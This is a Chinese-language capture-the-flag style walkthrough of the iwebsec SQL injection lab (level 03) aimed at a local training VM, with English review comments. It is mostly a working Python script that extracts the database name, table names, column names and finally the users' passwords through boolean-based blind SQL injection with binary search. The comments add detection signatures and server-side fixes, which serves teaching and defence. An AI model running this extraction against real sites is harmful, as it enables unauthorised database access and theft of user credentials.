目录
一、解题过程
(一)观察payload与结果
1. SQL 执行有结果时，页面输出 welcome to iwebsec!!!
2. 否则输出 1
(二)编写脚本逐项获取信息
1.获取数据库名字符串长度
先要为 Python 安装 requests 包：
pip install requests
Python 代码如下：
#encoding=utf-8
import requests
import os
# Lab target used throughout the walkthrough (iwebsec SQLi level 03).
# The host is a private-range address, i.e. a local training VM; every
# function below appends its probe to this base URL as the ``id`` query
# parameter.
url = "http://192.168.182.130:8001/sqli/03.php"
def DbLen():
    """Probe the length of the current database name via a boolean oracle.

    For each candidate length 1..19 the script appends the condition
    ``length(database())=i`` to the ``id`` parameter and issues a GET.
    The only signal is the response body: the welcome string is present when
    the injected condition is true (see the observation section above), so
    the page behaves as a true/false oracle rather than echoing any data.
    Every matching length is printed; the loop does not stop at the first
    hit and nothing is returned.

    NOTE(review): the endpoint presumably interpolates ``id`` straight into
    its SQL; the server-side fix is a parameterised query for ``id``. For a
    defender, 19 near-identical GETs to 03.php differing only in a number is
    the characteristic footprint of this probe.
    """
    for i in range(1, 20):
        # Boolean-based blind injection: ``--+`` comments out the rest of the
        # original query so only the injected comparison decides the result.
        payload = "?id=1 and (length(database())={})--+".format(i)
        req_url = url + payload
        rep = requests.get(url=req_url)
        if "welcome to iwebsec!!!" in rep.text:
            print("DB length is " + str(i))
# Step 1 of the walkthrough: run the length probe at import time
# (prints the matching length(s); returns nothing).
DbLen()
2.获取数据库名
def DbName():
    """Recover the database name one character at a time by binary search.

    Positions 1..7 are probed (the bound is hard-coded, not taken from
    ``DbLen``). For each position the search keeps ``l``/``r`` as a code-point
    range, initially [32, 130), and asks the oracle whether
    ``ord(mid(database(), i, 1)) > mid``: a true answer (welcome string
    present) moves ``l`` above ``mid``, a false one pulls ``r`` down to
    ``mid``. When ``l == r`` the final recomputed ``mid`` equals ``l``, which
    is the character's code point, and ``chr(mid)`` is appended to ``result``.
    Characters outside [32, 130) cannot be represented by this search.
    Positions past the end of the name presumably come back as a space
    (the comparison is never true, so the search collapses to 32) — verify
    against the target before trusting trailing characters.

    NOTE(review): ~7 requests per character (log2 of the 98-value range), so
    a defender sees a burst of tens of GETs to 03.php whose only difference is
    two numbers — a cheap signature to alert on. The real fix is server-side:
    a prepared statement for ``id``.
    """
    result = ""
    for i in range(1, 8):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            # Oracle question: is the i-th character's code point above mid?
            payload = "?id=1 and ord(mid((select database()),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            #print(req_url)
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        # Loop exit: l == r == mid, the recovered code point.
        result = result + chr(mid)
    print("the result is {}".format(result))
# Step 2 of the walkthrough: recover the database name (prints, returns nothing).
DbName()
3.获取表名
def TablesName():
    """Recover the comma-joined table names of the current schema.

    Same per-character binary search as ``DbName`` (range [32, 130), oracle
    answer read from the welcome string), applied to position 1..49 of
    ``group_concat(table_name)`` selected from ``information_schema.tables``
    for ``table_schema=database()``. The 49-character bound is hard-coded;
    longer lists are truncated and shorter ones presumably pad with spaces.

    NOTE(review): the triple-quoted payload embeds a literal newline (and, as
    pasted here, no indentation) inside the query string; the HTTP client
    presumably percent-encodes it — confirm the target tolerates it if
    results look wrong. As with ``DbName``, the footprint is a burst of
    near-identical GETs against 03.php, and the remediation is a
    parameterised query on the server.
    """
    result = ""
    for i in range(1, 50):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            # The string below is a single literal spanning two lines; its
            # second line is kept exactly as on the page.
            payload = '''?id=1 and ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{} --+'''.format(i, mid)
            req_url = url + payload
            #print(req_url)
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        # Loop exit: l == r == mid, the recovered code point.
        result = result + chr(mid)
    print("the result is {}".format(result))
# Step 3 of the walkthrough: list the schema's tables (prints, returns nothing).
TablesName()
4.获取users表的列名
def ColumnsName():
    """Recover the comma-joined column names of the ``users`` table.

    Identical search to ``DbName``/``TablesName`` (code-point range
    [32, 130), oracle read from the welcome string), applied to position
    1..29 of ``group_concat(column_name)`` from ``information_schema.columns``
    restricted to the current schema and ``table_name='users'``. The
    29-character bound is hard-coded.

    NOTE(review): the payload literal again spans two lines and therefore
    carries an embedded newline; see the remark on ``TablesName``. The
    information_schema reads only work because the injected SQL runs with
    the application's database privileges — least-privilege DB accounts
    limit what such an oracle can reach, but the fix is the parameterised
    query.
    """
    result = ""
    for i in range(1, 30):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            # Single two-line literal; second line kept exactly as on the page.
            payload = '''?id=1 and ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+'''.format(i, mid)
            req_url = url + payload
            #print(req_url)
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        # Loop exit: l == r == mid, the recovered code point.
        result = result + chr(mid)
    print("the result is {}".format(result))
# Step 4 of the walkthrough: list the users table's columns (prints, returns nothing).
ColumnsName()
5.获取password字段的数据
def GetData():
    """Recover the comma-joined ``password`` column of ``iwebsec.users``.

    Same binary search as the previous steps (range [32, 130), oracle read
    from the welcome string), over position 1..19 of
    ``group_concat(password)``. The schema name ``iwebsec`` is written
    literally here rather than via ``database()``. The 19-character bound is
    hard-coded.

    NOTE(review): this step is the point of the lab — a boolean oracle on a
    single integer parameter is enough to read an arbitrary column. Beyond
    the parameterised query, storing only salted password hashes limits the
    damage when such a column is extracted.
    """
    result = ""
    for i in range(1, 20):
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            # Oracle question: is the i-th character's code point above mid?
            payload = "?id=1 and ord(mid((select group_concat(password) from iwebsec.users),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            #print(req_url)
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        # Loop exit: l == r == mid, the recovered code point.
        result = result + chr(mid)
    print("the result is {}".format(result))
# Step 5 of the walkthrough: read the password column (prints, returns nothing).
GetData()